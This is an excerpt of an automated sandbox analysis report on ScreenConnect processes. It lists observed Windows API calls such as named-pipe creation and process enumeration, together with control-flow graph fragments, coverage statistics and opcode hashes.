                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: d292390da190c0a5f2cc2a05af87fe1e2f59654628fc040f5af571d398a41c17
                                                                                    • Instruction ID: 49baad4dc5d4da2db0e1ef565ed1b75550b337277a6982341b65d46d752d8f96
                                                                                    • Opcode Fuzzy Hash: d292390da190c0a5f2cc2a05af87fe1e2f59654628fc040f5af571d398a41c17
                                                                                    • Instruction Fuzzy Hash: DE3120B4C00218DFDB24CFAAD488BDEBBF4AF08300F14846AE819AB254C7759845CF91
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 051B2D10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 562 51a5fdc-51a66b6 564 51a66b8-51a66c0 562->564 565 51a66c2-51a66f8 K32EnumProcesses 562->565 564->565 567 51a66fa-51a6700 565->567 568 51a6701-51a6729 565->568 567->568
                                                                                    APIs
                                                                                    • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 051A66E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumProcesses
                                                                                    • String ID:
                                                                                    • API String ID: 84517404-0
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,051B3046), ref: 051B30EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,051B3046), ref: 051B30EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A67BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A67BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A67BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    APIs
                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 00CF4DBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2791525079.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_cf0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.8%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:100%
                                                                                    Total number of Nodes:3
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 13541 7ffb4a8b3642 13542 7ffb4a8d50f0 CreateNamedPipeW 13541->13542 13544 7ffb4a8d5223 13542->13544
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: b1efd09ad4698458dedcd9b665b1e4284e04d6930c1f295d84c8e981ff450e64
                                                                                    • Instruction ID: 3269274b4454d873042f8ada8a87b95e4b85baf8c5f4550e282b8efa94ca33b4
                                                                                    • Opcode Fuzzy Hash: b1efd09ad4698458dedcd9b665b1e4284e04d6930c1f295d84c8e981ff450e64
                                                                                    • Instruction Fuzzy Hash: 1DE1B2B5A0CA474BE799BF38C565EBA77D5EF98340F2401BDD04EC75C2DE28A8068340
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 29094b88ccb0cda400966a7fd125a584e367b782a0d01e0f9bd8aeac41a42247
                                                                                    • Instruction ID: b908e776ef59e6c86a36006822832558a8597d555e196da9193848629e9ca0e6
                                                                                    • Opcode Fuzzy Hash: 29094b88ccb0cda400966a7fd125a584e367b782a0d01e0f9bd8aeac41a42247
                                                                                    • Instruction Fuzzy Hash: 80E1C8B4A0CA474BE7A9BF38C565EB977D6EF88300F2441BDD04EC75C2DE29A8068241

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1280 7ffb4a8b3642-7ffb4a8d515a 1283 7ffb4a8d5164-7ffb4a8d5221 CreateNamedPipeW 1280->1283 1284 7ffb4a8d515c-7ffb4a8d5161 1280->1284 1286 7ffb4a8d5229-7ffb4a8d525c 1283->1286 1287 7ffb4a8d5223 1283->1287 1284->1283 1287->1286
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2815220924.00007FFB4A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A8B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4a8b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2489174969-0
                                                                                    • Opcode ID: db415ef3d4d909e623c4ecdb781d9fc40a87759caebc593782382e6ab5dd66d7
                                                                                    • Instruction ID: 429f3a3bb456d3f47b4fd554049383e275a207c8772ddf504a783f81628bc9c4
                                                                                    • Opcode Fuzzy Hash: db415ef3d4d909e623c4ecdb781d9fc40a87759caebc593782382e6ab5dd66d7
                                                                                    • Instruction Fuzzy Hash: 80518E7191CA1C8FDB68EF5CD845BA9BBE0FB59710F1442AEE44ED3241CB74A9818BC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6173464936091b3d9ea3519c2160166caea00b06a33a444c54ba37d4d7850962
                                                                                    • Instruction ID: f906697164dbc761c1f270d1bbe1601b6692c02f1619de0311dc250613404cef
                                                                                    • Opcode Fuzzy Hash: 6173464936091b3d9ea3519c2160166caea00b06a33a444c54ba37d4d7850962
                                                                                    • Instruction Fuzzy Hash: BB0272B161CA4A8FE798EF2CC469AB577D1FF98300F1444BED44EC7692DE28E8458741

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: h{J$p{J$x{J
                                                                                    • API String ID: 0-3980439061
                                                                                    • Opcode ID: ef17fbe26b723dcb88f19f5f54d600f615e5611faebffa72b020a12b45cba2b1
                                                                                    • Instruction ID: 68e85c92bf25d2b82f54368823662897ffbd10c66d5a3166a0f5e2a7ab510107
                                                                                    • Opcode Fuzzy Hash: ef17fbe26b723dcb88f19f5f54d600f615e5611faebffa72b020a12b45cba2b1
                                                                                    • Instruction Fuzzy Hash: 566195B6A0DA4A4FEB98EE28C855EA537D1FF54310B1401FDD48DDB586DE24EC46C780

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b52b42e6aa8ad52716cf1148b3b59560f700a5901eac62b6ad464df41babf991
                                                                                    • Instruction ID: 62e15aae28c8aeb452d35ccf744bfa70ae60984bfb994cf8df5beae5818503a5
                                                                                    • Opcode Fuzzy Hash: b52b42e6aa8ad52716cf1148b3b59560f700a5901eac62b6ad464df41babf991
                                                                                    • Instruction Fuzzy Hash: 0712E2A5A0DE4A4FF799EE3CD595AB53BD5EF59300F2400FEE489CB683DD28A8458340
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8b3815ff7b96fac0b3cb731433fed656629d9c10953087b932f781462fd71b45
                                                                                    • Instruction ID: ac6a1c372f66e52e9dbbdb0ff6445778cd4822cb8ae10b290ee5e3484235332f
                                                                                    • Opcode Fuzzy Hash: 8b3815ff7b96fac0b3cb731433fed656629d9c10953087b932f781462fd71b45
                                                                                    • Instruction Fuzzy Hash: 01C13AA690CA0B1BEB59FE38D846DF577D1EF54310B2402BED44EC7986DD29F94A8380
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 460d99353cbc5e8aee4ae6e2b20a7779fd371b0fcb6904d418dab2d0a3edac34
                                                                                    • Instruction ID: e6054cf7f37a8cfcfd6fc10c17b1249a5298aed67a310dd56726380e4a37038f
                                                                                    • Opcode Fuzzy Hash: 460d99353cbc5e8aee4ae6e2b20a7779fd371b0fcb6904d418dab2d0a3edac34
                                                                                    • Instruction Fuzzy Hash: 46B1E57960DA468FDB89FF3CD1A16E577A1FF5831472405FAC099CB587CA24E886C780
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bc1cc19e62a5f708512d8da1725c51b0e45f7a90997edcce32beb3088799c92
                                                                                    • Instruction ID: df8f5b18563b939e7fd71640f6bf3d1358f002ef388e77d793ee5093e78f586e
                                                                                    • Opcode Fuzzy Hash: 0bc1cc19e62a5f708512d8da1725c51b0e45f7a90997edcce32beb3088799c92
                                                                                    • Instruction Fuzzy Hash: 71B1E36AA0D6864FD78AFF3CD1A16E47BA0FF5531872805FAC098CB587CD14E88A8750
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b8422f69c43a1b4c1cb005a293105f162e28049911022677ccc6baaa3a5fdcb
                                                                                    • Instruction ID: e634bf19e4348de73ff0c435f69459be0caf8e29be60940490674ad2c39b686c
                                                                                    • Opcode Fuzzy Hash: 2b8422f69c43a1b4c1cb005a293105f162e28049911022677ccc6baaa3a5fdcb
                                                                                    • Instruction Fuzzy Hash: A94127A6A0DA8B5BE749FF7CD8559F97B91EF59300F2400FED489C3583DD29A8858380
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ebb82559055fd1dd48fd5c7ec8dedede7649da8b445938330d7288919f802fcd
                                                                                    • Instruction ID: c1c634e5389309d13f3b8b8a3fa0ab38b010b0645a10e9bd45993c0eddaae243
                                                                                    • Opcode Fuzzy Hash: ebb82559055fd1dd48fd5c7ec8dedede7649da8b445938330d7288919f802fcd
                                                                                    • Instruction Fuzzy Hash: 874125B6A0DA4A8BF755FEB8E8518E97B91FFD4304B1401BDE1CDC3592DE24A806C384
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7c7e0c04b2ce829057c3c23ab3bf39db3507bd36cd997a5b351619db77d52d55
                                                                                    • Instruction ID: 4ef7995fef3ccba88192d9c6b3a023df14a8dfcda05c1fb1d1c2d88f2e23ae6f
                                                                                    • Opcode Fuzzy Hash: 7c7e0c04b2ce829057c3c23ab3bf39db3507bd36cd997a5b351619db77d52d55
                                                                                    • Instruction Fuzzy Hash: 3D414FAB90E2925FE312BF7CF5A54E57F64FF4221871800FBD1C98B593EC0858498791
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a59da8985d90c995d817ee43dca7634ac8e63f7a0130fa5e517406ab47eb3565
                                                                                    • Instruction ID: 1125bb930dccfbca49bc295db61fe709a7e959ab36664269127e6a82545c8735
                                                                                    • Opcode Fuzzy Hash: a59da8985d90c995d817ee43dca7634ac8e63f7a0130fa5e517406ab47eb3565
                                                                                    • Instruction Fuzzy Hash: 0421E45690EBC51FF396AFB89D618A07FA4EF5721071901FFD088CB493C80C5C4A8361
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 299c6d7a1dabefa6b6c9529118a680a731cb59bf1f5b9905ab792911c37fb082
                                                                                    • Instruction ID: 5371e832d18fe9763cebcc21829e9feff71e0e52629ad74465f181a50e78b8e7
                                                                                    • Opcode Fuzzy Hash: 299c6d7a1dabefa6b6c9529118a680a731cb59bf1f5b9905ab792911c37fb082
                                                                                    • Instruction Fuzzy Hash: AE21B17AA0E2568AD702FF7CF5A14EA7B60EF4622C71801F7D1C98B563ED14188A8791
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 220358c5b657d7ec52fab0ed935725f2060710ad6aeca7a8b8e9ad0b6ff2e276
                                                                                    • Instruction ID: 48ff6f36503e72dd1a61802bc8a02e0941ad721609f2593b9960cff6784dc0e3
                                                                                    • Opcode Fuzzy Hash: 220358c5b657d7ec52fab0ed935725f2060710ad6aeca7a8b8e9ad0b6ff2e276
                                                                                    • Instruction Fuzzy Hash: 5C219A2114E2D95FC307AB78D8659DA7FB4EF8721470901E7E089CB0A3C91C995AC7A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 282f29203cd00d7d6872d1960f56ce6a1b765646ac43cab4f6c54f9125397e80
                                                                                    • Instruction ID: ae32510932e89648a645132e7d4a0a4f729aaa5695b78d61654e9d67e3565f42
                                                                                    • Opcode Fuzzy Hash: 282f29203cd00d7d6872d1960f56ce6a1b765646ac43cab4f6c54f9125397e80
                                                                                    • Instruction Fuzzy Hash: 3D1198B7B0DD494AFB99AFF8AE215F93A95EF44314F1400FEE08DC3992DE149901C285
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: {J$({J$({J$0{J
                                                                                    • API String ID: 0-3959754317

                                                                                    Execution Graph

                                                                                    Execution Coverage:12%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:10
                                                                                    Total number of Limit Nodes:2
                                                                                    execution_graph 15005 7ffb4ac08b9c 15009 7ffb4ac08baf 15005->15009 15006 7ffb4ac08c68 15007 7ffb4ac08d09 GlobalMemoryStatusEx 15008 7ffb4ac08d35 15007->15008 15009->15006 15009->15007 15010 7ffb4a8f8014 15012 7ffb4a8f801d 15010->15012 15011 7ffb4a8f8082 15012->15011 15013 7ffb4a8f80f6 SetProcessMitigationPolicy 15012->15013 15014 7ffb4a8f8152 15013->15014

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.1703478083.00007FFB4AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_7ffb4ac00000_ScreenConnect.jbxd

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.1697518885.00007FFB4A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A8F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_7ffb4a8f0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: MitigationPolicyProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1088084561-0